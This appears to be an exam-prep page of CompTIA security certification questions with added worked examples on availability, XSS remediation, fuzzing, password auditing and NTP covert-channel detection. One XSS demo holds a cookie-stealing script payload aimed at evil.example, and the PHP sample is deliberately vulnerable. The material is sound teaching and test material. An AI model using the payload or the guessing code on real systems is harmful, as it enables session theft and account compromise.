PrepAway - Latest Free Exam Questions & Answers

Exam CAS-001: CompTIA Advanced Security Practitioner (update May 17th, 2015)

Which of the following will provide the MOST thorough testing and satisfy the CEO’s requirements?

A firm’s Chief Executive Officer (CEO) is concerned that its IT staff lacks the knowledge to identify
complex vulnerabilities that may exist in the payment system being internally developed. The
payment system being developed will be sold to a number of organizations and is in direct
competition with another leading product. The CEO highlighted, in a risk management meeting,
that code base confidentiality is of utmost importance to allow the company to exceed the
competition in terms of product reliability, stability and performance. The CEO also highlighted that
company reputation for secure products is extremely important. Which of the following will provide
the MOST thorough testing and satisfy the CEO’s requirements?

Which of the following is the MOST accurate statement?

The security manager is in the process of writing a business case to replace a legacy secure web
gateway so as to meet an availability requirement of 99.9% service availability. According to the
vendor, the newly acquired firewall has been rated with an MTBF of 10,000 hours and has an
MTTR of 2 hours. This equates to 1.75 hours per year of downtime. Based on this, which of the
following is the MOST accurate statement?

Which of the following is the MTTR, based on the last month’s performance figures?

There have been some failures of the company’s customer-facing website. A security engineer
has analyzed the root cause to be the WAF. System logs show that the WAF has been down for
14 total hours over the past month in four separate situations. One of these situations was a two
hour scheduled maintenance activity aimed to improve the stability of the WAF. Which of the
following is the MTTR, based on the last month’s performance figures?
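Worked arithmetic for the two availability questions above, as an added example (not part of the original page). The MTBF, MTTR and 99.9% figures come from the question text; the WAF outage log is constructed to match the month described (14 hours over four events, one a two-hour scheduled maintenance window), and the treatment of scheduled maintenance as planned downtime rather than a repaired failure is an assumption stated in the code.

```python
"""Availability from MTBF/MTTR, and MTTR from an outage log."""
from __future__ import annotations

from dataclasses import dataclass

HOURS_PER_YEAR = 365 * 24  # 8760 h; leap years ignored


def availability(mtbf_hours: float, mttr_hours: float) -> float:
    """Steady-state availability A = MTBF / (MTBF + MTTR)."""
    return mtbf_hours / (mtbf_hours + mttr_hours)


def annual_downtime_hours(mtbf_hours: float, mttr_hours: float) -> float:
    """Expected unavailable hours per year: (1 - A) * 8760."""
    return (1.0 - availability(mtbf_hours, mttr_hours)) * HOURS_PER_YEAR


def sla_downtime_budget_hours(target: float) -> float:
    """Downtime per year that a target such as 0.999 still permits."""
    return (1.0 - target) * HOURS_PER_YEAR


def meets_sla(mtbf_hours: float, mttr_hours: float, target: float) -> bool:
    return availability(mtbf_hours, mttr_hours) >= target


@dataclass
class Outage:
    hours: float
    scheduled: bool  # planned maintenance window, not a failure


def mttr_from_outages(outages: list[Outage]) -> float:
    """Mean time to repair over unplanned outages only.

    Assumption: a scheduled maintenance window is planned downtime, so it
    counts toward neither the repair time nor the failure count.
    """
    unplanned = [o for o in outages if not o.scheduled]
    if not unplanned:
        raise ValueError("no unplanned outages; MTTR is undefined")
    return sum(o.hours for o in unplanned) / len(unplanned)


# Figures from the secure web gateway question
FIREWALL_MTBF, FIREWALL_MTTR, SLA_TARGET = 10_000.0, 2.0, 0.999

# Constructed outage log for the WAF month: 14 h in total across four events,
# one of them the two-hour scheduled maintenance
WAF_OUTAGES = [
    Outage(hours=5.0, scheduled=False),
    Outage(hours=2.0, scheduled=True),
    Outage(hours=4.0, scheduled=False),
    Outage(hours=3.0, scheduled=False),
]

if __name__ == "__main__":
    print(f"availability  = {availability(FIREWALL_MTBF, FIREWALL_MTTR):.5f}")
    print(f"downtime/year = {annual_downtime_hours(FIREWALL_MTBF, FIREWALL_MTTR):.2f} h")
    print(f"99.9% budget  = {sla_downtime_budget_hours(SLA_TARGET):.2f} h/year")
    print(f"meets 99.9%   = {meets_sla(FIREWALL_MTBF, FIREWALL_MTTR, SLA_TARGET)}")
    print(f"WAF MTTR      = {mttr_from_outages(WAF_OUTAGES):.1f} h")
```

The 1.75 hours in the question is 8760 × 2 / (10,000 + 2); a 99.9% target allows 8.76 hours a year, so the stated figures clear it with room to spare. For the WAF, 12 unplanned hours over three unplanned events gives an MTTR of 4 hours; counting the maintenance window would wrongly dilute it to 3.5.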

Which of the following vulnerabilities is present in the below source code file named ‘AuthenticatedArea.php’?

Which of the following vulnerabilities is present in the below source code file named
‘AuthenticatedArea.php’?
<html><head><title>AuthenticatedArea</title></head>
<?php
// Site-wide helpers (path as given in the listing)
include("/inc/common.php");
// Username taken straight from the request (GET, POST or cookie), not from the session
$username = $_REQUEST['username'];
if ($username != "") {
    // Request value written into the page as-is, with no output encoding
    echo "Your username is: " . $_REQUEST['username'];
} else {
    // Redirect issued after HTML output has already started
    header("Location: /login.php");
}
?>
</html>
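The AuthenticatedArea.php logic above, mirrored in Python as an added example (not code from the original page), so the vulnerable behaviour and a hardened version can be run side by side without a web server. Each handler takes a dict of request parameters standing in for PHP's $_REQUEST and returns (status, headers, body). The hardened handler shows the three fixes a reviewer would ask for: output encoding for the HTML text context, the redirect decided before any output and followed by a stop, and the identity taken from a server-side session rather than the request. The session dict and the payload string are constructed for the demonstration.

```python
"""Reflected XSS in the PHP page, and the hardened equivalent."""
from __future__ import annotations

from html import escape


def vulnerable_handler(params: dict) -> tuple[int, dict, str]:
    """Reflects the raw request value into the page, as the PHP does."""
    username = params.get("username", "")
    body = "<html><head><title>AuthenticatedArea</title></head>"
    if username != "":
        # Untrusted input concatenated straight into HTML: reflected XSS
        body += "Your username is: " + username
        return 200, {}, body + "</html>"
    # The redirect is requested after output has begun; PHP would report
    # "headers already sent" and still serve the page
    return 302, {"Location": "/login.php"}, body + "</html>"


def hardened_handler(params: dict, session: dict | None = None) -> tuple[int, dict, str]:
    """Same page with the defects fixed. `session` stands in for the
    server-side session store; the request is never trusted for identity."""
    username = (session or {}).get("username", "")
    if username == "":
        # Decide before emitting any body, then stop
        # (PHP: header('Location: /login.php'); exit;)
        return 302, {"Location": "/login.php"}, ""
    # Encode for the HTML text context; quote=True also encodes " and '
    # (PHP: htmlspecialchars($u, ENT_QUOTES | ENT_HTML5, 'UTF-8'))
    safe = escape(username, quote=True)
    body = ("<html><head><title>AuthenticatedArea</title></head>"
            f"<body>Your username is: {safe}</body></html>")
    return 200, {"Content-Type": "text/html; charset=utf-8"}, body


# Constructed payload: what a crafted link ?username=<script>... delivers
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def reflects_verbatim(body: str, payload: str = PAYLOAD) -> bool:
    """True if the page contains the payload byte-for-byte (i.e. it will execute)."""
    return payload in body


if __name__ == "__main__":
    _, _, vuln_body = vulnerable_handler({"username": PAYLOAD})
    _, _, hard_body = hardened_handler({"username": PAYLOAD}, session={"username": PAYLOAD})
    print("vulnerable reflects payload:", reflects_verbatim(vuln_body))
    print("hardened reflects payload:  ", reflects_verbatim(hard_body))
    print(hard_body)
```

Even a username that legitimately contains markup is rendered inert by the hardened handler, because the encoding is applied at the point where the value enters the HTML context rather than at input time.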

How many years will it take to see a positive ROI?

To support a software security initiative business case, a project manager needs to provide a cost
benefit analysis. The project manager has asked the security consultant to perform a return on
investment study. It has been estimated that by spending $300,000 on the software security
initiative, a 30% savings in cost will be realized for each project. Based on an average of 8
software projects at a current cost of $50,000 each, how many years will it take to see a positive
ROI?

Which of the following should the administrator use to reproduce the issue?

During user acceptance testing, the security administrator believes they have discovered an issue in
the login prompt of the company’s financial system. While entering the username and password,
the program crashed and displayed the system command prompt. The security administrator
believes that one of the fields may have been mistyped and wants to reproduce the issue to report
it to the software developers. Which of the following should the administrator use to reproduce the
issue?
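A small mutation fuzzer of the kind used to reproduce an input-triggered crash such as the one above, added here as an example (not from the original page). The login routine is a constructed stand-in for the financial system: it raises where a native program would crash (a field longer than a fixed buffer, a format specifier reaching a formatter). The fuzzer derives inputs from a seed credential pair, runs each against the target, keeps the first input per crash type, and minimises it so the report to the developers contains the shortest input that still reproduces the fault. The seed credentials and the MAX_FIELD limit are assumptions.

```python
"""Mutation fuzzer with crash minimisation, against a constructed login target."""
from __future__ import annotations

import random
import string
from dataclasses import dataclass
from typing import Callable

MAX_FIELD = 32  # constructed limit for the stand-in target


def toy_login(username: str, password: str) -> bool:
    """Constructed target; each raise models a crash of the real program."""
    if len(username) > MAX_FIELD or len(password) > MAX_FIELD:
        raise MemoryError("field longer than fixed buffer")
    if "%" in username:
        raise ValueError("format specifier reached the formatter")
    return username == "admin" and password == "hunter2"


@dataclass
class Crash:
    username: str
    password: str
    error: str  # exception class name, used to tell crash types apart


# Mutators: each takes a field value and a seeded RNG and returns a variant
def repeat(s: str, rng: random.Random) -> str:
    return s * 8


def append_junk(s: str, rng: random.Random) -> str:
    return s + "".join(rng.choices(string.printable, k=rng.randint(1, 40)))


def insert_format(s: str, rng: random.Random) -> str:
    i = rng.randint(0, len(s))
    return s[:i] + rng.choice(["%s", "%n", "%x%x"]) + s[i:]


def add_control_chars(s: str, rng: random.Random) -> str:
    return s + "".join(chr(rng.randint(0, 31)) for _ in range(rng.randint(1, 4)))


def truncate(s: str, rng: random.Random) -> str:
    return s[: rng.randint(0, len(s))]


MUTATORS = [repeat, append_junk, insert_format, add_control_chars, truncate]


def crash_type(target: Callable[[str, str], bool], user: str, pw: str) -> str | None:
    """Exception class name if the target fails on this input, else None."""
    try:
        target(user, pw)
        return None
    except Exception as exc:  # any uncaught exception counts as a crash
        return type(exc).__name__


def fuzz(target, seed_user: str, seed_pass: str,
         iterations: int = 200, rng_seed: int = 1) -> list[Crash]:
    rng = random.Random(rng_seed)  # fixed seed: the run is reproducible
    found: list[Crash] = []
    for i in range(iterations):
        mutate = MUTATORS[i % len(MUTATORS)]  # cycle so every mutator is exercised
        if rng.random() < 0.5:
            user, pw = mutate(seed_user, rng), seed_pass
        else:
            user, pw = seed_user, mutate(seed_pass, rng)
        err = crash_type(target, user, pw)
        if err and all(c.error != err for c in found):
            found.append(Crash(user, pw, err))
    return found


def _shrink(still_crashes: Callable[[str], bool], value: str) -> str:
    """Drop one character at a time while the crash is preserved."""
    i = 0
    while i < len(value):
        trial = value[:i] + value[i + 1:]
        if still_crashes(trial):
            value = trial  # keep the shorter input and retry the same index
        else:
            i += 1
    return value


def minimise(target, crash: Crash) -> Crash:
    """Shortest username/password pair that still raises the same error."""
    user = _shrink(lambda u: crash_type(target, u, crash.password) == crash.error, crash.username)
    pw = _shrink(lambda p: crash_type(target, user, p) == crash.error, crash.password)
    return Crash(user, pw, crash.error)


if __name__ == "__main__":
    for c in fuzz(toy_login, "alice", "hunter2"):
        m = minimise(toy_login, c)
        print(f"{c.error}: username={m.username!r} password={m.password!r}")
```

Against a real login prompt the target would be a wrapper that drives the binary and detects the crash (exit code, signal, or the command prompt appearing on the terminal), but the loop, the fixed RNG seed for reproducibility, and the minimisation step are the same.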

Which of the following options is BEST suited to run the password auditing software and produce a report in the SHORTEST amount of time?

A security administrator wants to perform an audit of the company password file to ensure users
are not using personal information such as addresses and birthdays as part of their password. The
company employs 200,000 users, has virtualized environments with cluster and cloud-based
computing resources, and enforces a minimum password length of 14 characters. Which of the
following options is BEST suited to run the password auditing software and produce a report in the
SHORTEST amount of time?
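An added example of the audit described above (not from the original page): candidate passwords are generated from each user's own personal details, hashed, and compared with the stored hash, and the user list is sharded across worker processes so that the job scales to the clustered and cloud resources the question mentions. The user records, salts and hashes are constructed; SHA-256 is used only so the block runs stand-alone (a real directory would hold a slow, salted hash such as bcrypt or PBKDF2, which is exactly why the work is worth splitting across many cores or nodes).

```python
"""PII-based password audit, sharded across worker processes."""
from __future__ import annotations

import hashlib
from concurrent.futures import ProcessPoolExecutor
from dataclasses import dataclass
from datetime import date

MIN_PASSWORD_LEN = 14  # the policy minimum from the question


@dataclass(frozen=True)
class UserRecord:
    username: str
    first_name: str
    last_name: str
    street: str
    city: str
    birthdate: date
    salt: str
    pw_hash: str  # hex SHA-256 of salt + password (constructed scheme)


def hash_password(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def pii_words(rec: UserRecord) -> set[str]:
    """Name, street and city words in the case forms people actually type."""
    base = [rec.first_name, rec.last_name, rec.city,
            rec.street.replace(" ", ""), *rec.street.split()]
    forms: set[str] = set()
    for w in base:
        forms.update({w, w.lower(), w.upper(), w.capitalize()})
    return forms


def pii_digits(rec: UserRecord) -> set[str]:
    """Birthday in common numeric layouts, plus the usual filler suffixes."""
    d = rec.birthdate
    layouts = ("%Y", "%y", "%d%m%Y", "%m%d%Y", "%Y%m%d", "%d%m")
    return {d.strftime(f) for f in layouts} | {"1", "123"}


def candidates(rec: UserRecord) -> set[str]:
    """Combinations of PII words and dates long enough to pass the 14-char rule."""
    words, digits, seps = pii_words(rec), pii_digits(rec), ("", "!", "_", "@")
    out: set[str] = set()
    for w in words:
        for s in seps:
            for dg in digits:
                out.add(w + s + dg)
                out.add(dg + s + w)
            for w2 in words:
                out.add(w + s + w2)
                for dg in digits:
                    out.add(w + s + w2 + dg)
    return {c for c in out if len(c) >= MIN_PASSWORD_LEN}


def audit_user(rec: UserRecord) -> str | None:
    """Return the PII-derived password if the stored hash matches one."""
    for cand in candidates(rec):
        if hash_password(rec.salt, cand) == rec.pw_hash:
            return cand
    return None


def _audit_chunk(chunk: list[UserRecord]) -> dict[str, str]:
    return {r.username: hit for r in chunk if (hit := audit_user(r))}


def audit(users: list[UserRecord], workers: int = 1) -> dict[str, str]:
    """Shard the user list across worker processes and merge the findings."""
    if workers <= 1:
        return _audit_chunk(users)
    size = -(-len(users) // workers)  # ceiling division
    chunks = [users[i:i + size] for i in range(0, len(users), size)]
    findings: dict[str, str] = {}
    with ProcessPoolExecutor(max_workers=workers) as pool:
        for partial in pool.map(_audit_chunk, chunks):
            findings.update(partial)
    return findings


# Constructed records: alice's password is her street plus birth year,
# bob's is unrelated to his personal details
USERS = [
    UserRecord("alice", "Alice", "Morgan", "Maple Avenue", "Springfield",
               date(1985, 7, 4), "s1", hash_password("s1", "MapleAvenue1985")),
    UserRecord("bob", "Bob", "Reyes", "Oak Street", "Shelbyville",
               date(1990, 2, 28), "s2", hash_password("s2", "Tq9!vLp2#rWx7Zm")),
]

if __name__ == "__main__":
    print(audit(USERS, workers=2))
```

Because each user's candidate set is independent, the shard boundary is the user record: a 200,000-user file splits cleanly across as many workers, machines or cloud instances as are available, and the report is the union of the per-shard findings.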

Which of the following should the network administrator do to resolve the performance issue after analyzing the above information?

The network administrator has been tracking the cause of network performance problems and
decides to take a look at the internal and external router stats.

Which of the following should the network administrator do to resolve the performance issue after
analyzing the above information?

Which of the following should the security administrator report to upper management based on the above output?

The security administrator at ‘company.com’ is reviewing the network logs and notices a new UDP
port pattern where the amount of UDP port 123 packets has increased by 20% above the
baseline. The administrator runs a packet capturing tool from a server attached to a SPAN port
and notices the following.
UDP 192.168.0.1:123 -> 172.60.3.0:123
UDP 192.168.0.36:123 -> time.company.com
UDP 192.168.0.112:123 -> 172.60.3.0:123
UDP 192.168.0.91:123 -> time.company.com
UDP 192.168.0.211:123 -> 172.60.3.0:123
UDP 192.168.0.237:123 -> time.company.com
UDP 192.168.0.78:123 -> 172.60.3.0:123
The corporate HIPS console reports an MD5 hash mismatch on the svchost.exe file of the
following computers:
192.168.0.1
192.168.0.112
192.168.0.211
192.168.0.78
Which of the following should the security administrator report to upper management based on the
above output?
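The correlation the administrator would run before reporting, as an added example (not from the original page). The capture lines and the HIPS host list are copied from the question; the trusted-server list is an assumption (time.company.com is taken to be the only sanctioned time source). The script parses the UDP flows, flags internal hosts sending port 123 traffic anywhere other than the trusted server, and intersects them with the hosts whose svchost.exe hash changed.

```python
"""Correlate NTP-port flows with HIPS file-integrity alerts."""
from __future__ import annotations

import ipaddress
import re

CAPTURE = """
UDP 192.168.0.1:123 -> 172.60.3.0:123
UDP 192.168.0.36:123 -> time.company.com
UDP 192.168.0.112:123 -> 172.60.3.0:123
UDP 192.168.0.91:123 -> time.company.com
UDP 192.168.0.211:123 -> 172.60.3.0:123
UDP 192.168.0.237:123 -> time.company.com
UDP 192.168.0.78:123 -> 172.60.3.0:123
"""

HIPS_MD5_MISMATCH = {"192.168.0.1", "192.168.0.112", "192.168.0.211", "192.168.0.78"}

TRUSTED_NTP = {"time.company.com"}  # assumption: the only sanctioned time source

NTP_PORT = 123
LINE = re.compile(r"^UDP\s+(\S+):(\d+)\s+->\s+([^\s:]+)(?::(\d+))?\s*$")


def parse_capture(text: str) -> list[dict]:
    """One dict per flow line; destination port is None for host-only lines."""
    flows = []
    for raw in text.strip().splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip anything that is not a UDP flow line
        src, sport, dst, dport = m.groups()
        flows.append({"src": src, "sport": int(sport), "dst": dst,
                      "dport": int(dport) if dport else None})
    return flows


def is_external(host: str) -> bool:
    """True for a public IP literal; hostnames are judged by the trusted list."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def unexpected_ntp_sources(flows: list[dict], trusted: set[str]) -> set[str]:
    """Internal hosts sending UDP/123 to anything but a trusted server."""
    suspects = set()
    for f in flows:
        if NTP_PORT not in (f["sport"], f["dport"]):
            continue
        if f["dst"] not in trusted:
            suspects.add(f["src"])
    return suspects


def correlate(capture: str, hips_hosts: set[str], trusted: set[str]) -> dict:
    """Cross-reference the traffic anomaly with the integrity alerts."""
    flows = parse_capture(capture)
    ntp_suspects = unexpected_ntp_sources(flows, trusted)
    return {
        "unexpected_ntp_sources": ntp_suspects,
        "external_ntp_destinations": {f["dst"] for f in flows if is_external(f["dst"])},
        "hips_only": hips_hosts - ntp_suspects,
        "ntp_only": ntp_suspects - hips_hosts,
        "likely_compromised": ntp_suspects & hips_hosts,
    }


if __name__ == "__main__":
    for key, value in correlate(CAPTURE, HIPS_MD5_MISMATCH, TRUSTED_NTP).items():
        print(f"{key}: {sorted(value)}")
```

The two independent signals land on the same four hosts: each has a modified svchost.exe and each is sending port 123 traffic to 172.60.3.0, which is not in a private range and is not the corporate time server. That pairing is what upper management needs to hear, stated as a likely compromise using the NTP port as a covert channel, rather than as a clock-sync oddity.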

Which of the following is the recommendation the IT Director should present to senior staff?

A mid-sized company is rewriting its security policies and has halted the rewrite
because the company’s executives believe that its major vendors, who have cultivated a strong
personal and professional relationship with the senior level staff, have a good handle on
compliance and regulatory standards. Therefore, the executive level managers are allowing
vendors to play a large role in writing the policy. Having experienced this type of environment in
previous positions, and being aware that vendors may not always put the company’s interests first,
the IT Director decides that while vendor support is important, it is critical that the company writes
the policy objectively. Which of the following is the recommendation the IT Director should present
to senior staff?
